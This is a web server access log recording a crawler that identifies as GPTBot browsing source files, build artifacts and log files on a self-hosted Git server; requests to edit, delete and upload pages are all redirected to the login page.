[Client 74.7.227.38] [Length 33669] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" -[17/Feb/2026:16:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" -[17/Feb/2026:16:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" -[17/Feb/2026:16:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" -[17/Feb/2026:16:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43101] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21738] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" -[17/Feb/2026:16:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" -[17/Feb/2026:16:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" -[17/Feb/2026:16:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" -[17/Feb/2026:16:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10770] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12432] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" -[17/Feb/2026:16:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11454] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" -[17/Feb/2026:16:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html" [Client 74.7.227.38] [Length 38261] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:16:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33632] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38763] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10973] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31300] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23731] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33445] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:35:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:35:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:35:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13869] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12540] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13306] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 19640] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12018] [Gzip 6.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35839] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:36:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:16:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/index.html" -[17/Feb/2026:16:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 1418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] 